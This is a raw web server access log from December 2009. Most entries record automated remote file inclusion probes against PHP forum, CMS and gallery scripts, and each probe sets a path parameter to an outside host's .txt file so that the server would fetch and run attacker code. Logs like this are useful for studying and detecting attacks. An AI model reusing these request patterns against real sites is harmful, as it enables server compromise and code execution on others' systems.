67.227.136.138 - - [16/Dec/2009:05:50:28 -0600] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:50:33 -0600] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:50:33 -0600] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:50:33 -0600] "GET /logs/access_log.1245801600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:50:43 -0600] "GET /logs/access_log.1244073600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:05:50:54 -0600] "GET /logs/access_log.1244073600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
81.191.133.141 - - [16/Dec/2009:05:51:26 -0600] "GET //modules/vWar_Account/includes/get_header.php?vwar_root=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
81.191.133.141 - - [16/Dec/2009:05:51:26 -0600] "GET /logs//modules/vWar_Account/includes/get_header.php?vwar_root=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
81.191.133.141 - - [16/Dec/2009:05:51:26 -0600] "GET /logs/access_log.1241913600//modules/vWar_Account/includes/get_header.php?vwar_root=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
64.40.103.14 - - [16/Dec/2009:05:54:10 -0600] "GET /index.php?mode=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 292 "-""-"
209.92.156.53 - - [16/Dec/2009:05:54:12 -0600] "GET /logs/access_log.1254355200/principal.php?conteudo=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:05:54:12 -0600] "GET /logs/principal.php?conteudo=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:05:54:12 -0600] "GET /principal.php?conteudo=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:05:54:12 -0600] "GET /logs/access_log.1256342400/principal.php?conteudo=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.191.133.141 - - [16/Dec/2009:05:54:47 -0600] "GET /logs/access_log.1234569600//modules/vWar_Account/includes/get_header.php?vwar_root=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
212.158.160.50 - - [16/Dec/2009:05:55:07 -0600] "GET /logs/access_log.1240272000%20/index.php?menu=deti&page=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 320 "-""-"
124.49.100.254 - - [16/Dec/2009:05:55:35 -0600] "GET /?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:05:55:35 -0600] "GET /logs/access_log.1255478400/?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:05:55:35 -0600] "GET /logs/access_log.1255651200/?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.49.100.254 - - [16/Dec/2009:05:55:37 -0600] "GET /logs/?pagina=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 200 216791 "-""Mozilla/5.0"
64.40.103.14 - - [16/Dec/2009:05:58:02 -0600] "GET /logs/index.php?mode=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 297 "-""-"
81.191.133.141 - - [16/Dec/2009:05:58:56 -0600] "GET //modules/vWar_Account/includes/get_header.php?vwar_root=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
81.191.133.141 - - [16/Dec/2009:05:58:56 -0600] "GET /logs/access_log.1237075200//modules/vWar_Account/includes/get_header.php?vwar_root=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
81.191.133.141 - - [16/Dec/2009:05:58:56 -0600] "GET /logs//modules/vWar_Account/includes/get_header.php?vwar_root=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
114.108.177.238 - - [16/Dec/2009:06:00:21 -0600] "GET /logs/access_log.1255651200/principal.php?conteudo=http://bestparentever.com//poll/zfxid1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.108.177.238 - - [16/Dec/2009:06:00:21 -0600] "GET /logs/access_log.1255046400/principal.php?conteudo=http://bestparentever.com//poll/zfxid1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.108.177.238 - - [16/Dec/2009:06:00:21 -0600] "GET /logs/principal.php?conteudo=http://bestparentever.com//poll/zfxid1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.108.177.238 - - [16/Dec/2009:06:00:21 -0600] "GET /principal.php?conteudo=http://bestparentever.com//poll/zfxid1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
114.108.177.238 - - [16/Dec/2009:06:00:43 -0600] "GET /principal.php?conteudo=http://bestparentever.com//poll/zfxid1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
114.108.177.238 - - [16/Dec/2009:06:00:43 -0600] "GET /logs/principal.php?conteudo=http://bestparentever.com//poll/zfxid1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.108.177.238 - - [16/Dec/2009:06:00:43 -0600] "GET /logs/access_log.1255046400/principal.php?conteudo=http://bestparentever.com//poll/zfxid1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.108.177.238 - - [16/Dec/2009:06:00:43 -0600] "GET /logs/access_log.1255651200/principal.php?conteudo=http://bestparentever.com//poll/zfxid1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.55.207.117 - - [16/Dec/2009:06:01:08 -0600] "GET /logs/access_log.1155772800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.233.78.75 - - [16/Dec/2009:06:05:32 -0600] "GET /logs/access_log.1257638400//skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 326 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:05:32 -0600] "GET /logs//skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 304 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:05:32 -0600] "GET //skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 299 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:05:33 -0600] "GET /logs/access_log.1257638400//skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 326 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:05:34 -0600] "GET /logs//skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 304 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:05:34 -0600] "GET //skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 299 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:06:07:17 -0600] "GET /logs/access_log.1228608000//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
61.47.61.97 - - [16/Dec/2009:06:07:17 -0600] "GET /logs//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
61.47.61.97 - - [16/Dec/2009:06:07:44 -0600] "GET /logs/access_log.1228608000//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
61.47.61.97 - - [16/Dec/2009:06:07:48 -0600] "GET /logs//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
61.47.61.97 - - [16/Dec/2009:06:07:48 -0600] "GET //includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
65.55.207.49 - - [16/Dec/2009:06:08:39 -0600] "GET /logs/access_log.1223251200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.163 - - [16/Dec/2009:06:09:08 -0600] "GET /logs/access_log.1159315200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.38.64.117 - - [16/Dec/2009:06:10:37 -0600] "GET //skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:10:37 -0600] "GET /logs/access_log.1256342400//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:10:38 -0600] "GET /logs//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:11:31 -0600] "GET //skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:11:31 -0600] "GET /logs//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:11:31 -0600] "GET /logs/access_log.1253577600//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:11:38 -0600] "GET /logs/access_log.1250899200//skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
74.86.82.218 - - [16/Dec/2009:06:15:59 -0600] "GET /drupal/?_menu[callbacks][1][callback]=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 290 "-""-"
209.92.156.53 - - [16/Dec/2009:06:17:07 -0600] "GET /logs/access_log.1248566400/?phpbb_root_pat%20h=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:06:17:07 -0600] "GET /?phpbb_root_pat%20h=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:06:17:07 -0600] "GET /logs/access_log.1255132800/?phpbb_root_pat%20h=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:06:17:08 -0600] "GET /logs/?phpbb_root_pat%20h=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 216791 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:17:46 -0600] "GET //skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 299 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:17:46 -0600] "GET /logs//skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 304 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:17:46 -0600] "GET /logs/access_log.1257465600//skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 326 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:17:47 -0600] "GET /logs/access_log.1255910400//skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 326 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:17:47 -0600] "GET /logs/access_log.1256515200//skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 326 "-""Mozilla/5.0"
208.116.0.130 - - [16/Dec/2009:06:17:55 -0600] "GET /logs//includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.831"
208.116.0.130 - - [16/Dec/2009:06:17:55 -0600] "GET //includes/errors.php?error=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.831"
203.233.78.75 - - [16/Dec/2009:06:18:23 -0600] "GET //skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 299 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:18:23 -0600] "GET /logs/access_log.1257206400//skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 326 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:18:23 -0600] "GET /logs/access_log.1257465600//skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 326 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:18:23 -0600] "GET /logs//skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 304 "-""Mozilla/5.0"
203.233.78.75 - - [16/Dec/2009:06:18:36 -0600] "GET /logs/access_log.1256515200//skin/jiyoo_skyblue/view.php?view%5Buse_category%5D=1&dir=http://n34.biz/id1.txt??? HTTP/1.0" 404 326 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:06:19:17 -0600] "GET /?phpbb_root_pat%20h=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:06:19:17 -0600] "GET /logs/access_log.1255132800/?phpbb_root_pat%20h=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:06:19:17 -0600] "GET /logs/access_log.1248566400/?phpbb_root_pat%20h=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:06:19:22 -0600] "GET /logs/?phpbb_root_pat%20h=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 200 216791 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:22:53 -0600] "GET //index.php?option=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:22:53 -0600] "GET /logs//index.php?option=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
70.38.64.117 - - [16/Dec/2009:06:22:53 -0600] "GET /logs/access_log.1242864000//index.php?option=http://www.jjdd.co.kr/nalog/fx29id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:06:26:43 -0600] "GET //phpraid/announcements.php?phpraid_dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:06:26:43 -0600] "GET /logs//phpraid/announcements.php?phpraid_dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:06:26:43 -0600] "GET /logs/access_log.1257292800//phpraid/announcements.php?phpraid_dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:06:26:55 -0600] "GET /logs/access_log.1255478400///skin/buzzard_espoon/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:06:26:55 -0600] "GET /logs///skin/buzzard_espoon/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:06:26:55 -0600] "GET /logs/access_log.1256169600///skin/buzzard_espoon/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:06:26:55 -0600] "GET ///skin/buzzard_espoon/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:06:27:27 -0600] "GET /logs/access_log.1255478400///skin/buzzard_espoon/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:06:27:27 -0600] "GET /logs///skin/buzzard_espoon/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:06:27:27 -0600] "GET /logs/access_log.1256169600///skin/buzzard_espoon/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
125.245.165.135 - - [16/Dec/2009:06:27:27 -0600] "GET ///skin/buzzard_espoon/setup.php?dir=http://www.soraperra.com/canazeiinforma/open.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
209.92.156.53 - - [16/Dec/2009:06:27:30 -0600] "GET /logs/access_log.1254268800//phpraid/announcements.php?phpraid_dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:28:04 -0600] "GET /logs/access_log.1245974400/////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 384 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:28:04 -0600] "GET /logs/access_log.1252281600/////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 384 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:28:05 -0600] "GET /////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:28:05 -0600] "GET /logs/////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:28:55 -0600] "GET /logs/access_log.1257292800//phpraid/announcements.php?phpraid_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:28:55 -0600] "GET //phpraid/announcements.php?phpraid_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:28:55 -0600] "GET /logs//phpraid/announcements.php?phpraid_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:29:07 -0600] "GET /logs/access_log.1254268800//phpraid/announcements.php?phpraid_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:29:07 -0600] "GET /logs//phpraid/announcements.php?phpraid_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:29:07 -0600] "GET //phpraid/announcements.php?phpraid_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:29:07 -0600] "GET /logs/access_log.1257292800//phpraid/announcements.php?phpraid_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:29:20 -0600] "GET /logs/access_log.1254268800//phpraid/announcements.php?phpraid_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:06:29:21 -0600] "GET /logs//phpraid/announcements.php?phpraid_dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:06:29:22 -0600] "GET //phpraid/announcements.php?phpraid_dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:06:29:30 -0600] "GET /logs/access_log.1257292800//phpraid/announcements.php?phpraid_dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:06:29:30 -0600] "GET /logs//phpraid/announcements.php?phpraid_dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:06:29:30 -0600] "GET /logs/access_log.1257292800//phpraid/announcements.php?phpraid_dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:06:29:30 -0600] "GET //phpraid/announcements.php?phpraid_dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:06:29:35 -0600] "GET /logs/access_log.1254268800//phpraid/announcements.php?phpraid_dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.187.91.50 - - [16/Dec/2009:06:29:58 -0600] "GET /logs/access_log.1254268800//phpraid/announcements.php?phpraid_dir=http://english.ksef.net/bbs/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:06:33:36 -0600] "GET /logs/admincp.php?rootpath=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:06:33:36 -0600] "GET /logs/access_log.1239408000/admincp.php?rootpath=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:06:33:36 -0600] "GET /admincp.php?rootpath=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:06:33:36 -0600] "GET /logs/access_log.1243468800/admincp.php?rootpath=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:06:33:37 -0600] "GET /logs/access_log.1243468800/admincp.php?rootpath=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:06:33:37 -0600] "GET /logs/admincp.php?rootpath=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:06:33:37 -0600] "GET /admincp.php?rootpath=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.18.20.210 - - [16/Dec/2009:06:33:37 -0600] "GET /logs/access_log.1239408000/admincp.php?rootpath=http://www.luckstone.kr/ams/amboard3/zx/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:35:52 -0600] "GET /////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:35:54 -0600] "GET /logs/access_log.1245974400/////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 384 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:35:54 -0600] "GET /logs/////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
202.88.229.100 - - [16/Dec/2009:06:35:54 -0600] "GET /logs/access_log.1252281600/////administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 384 "-""Mozilla/5.0"
203.83.247.180 - - [16/Dec/2009:06:37:38 -0600] "GET /logs/access_log.1230163200///?_PHPLIB[libdir]=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
203.83.247.180 - - [16/Dec/2009:06:37:38 -0600] "GET ///?_PHPLIB[libdir]=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
203.83.247.180 - - [16/Dec/2009:06:37:40 -0600] "GET /logs///?_PHPLIB[libdir]=http://www.seorakhoney.com/shop/mail/one.txt??? HTTP/1.1" 200 216797 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:40:32 -0600] "GET /logs/access_log.1253923200///?_SERVER[DOCUMENT_ROOT]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:40:32 -0600] "GET ///?_SERVER[DOCUMENT_ROOT]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:40:32 -0600] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 200 216797 "-""Mozilla/5.0"
67.227.136.138 - - [16/Dec/2009:06:40:36 -0600] "GET ///?_SERVER[DOCUMENT_ROOT]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
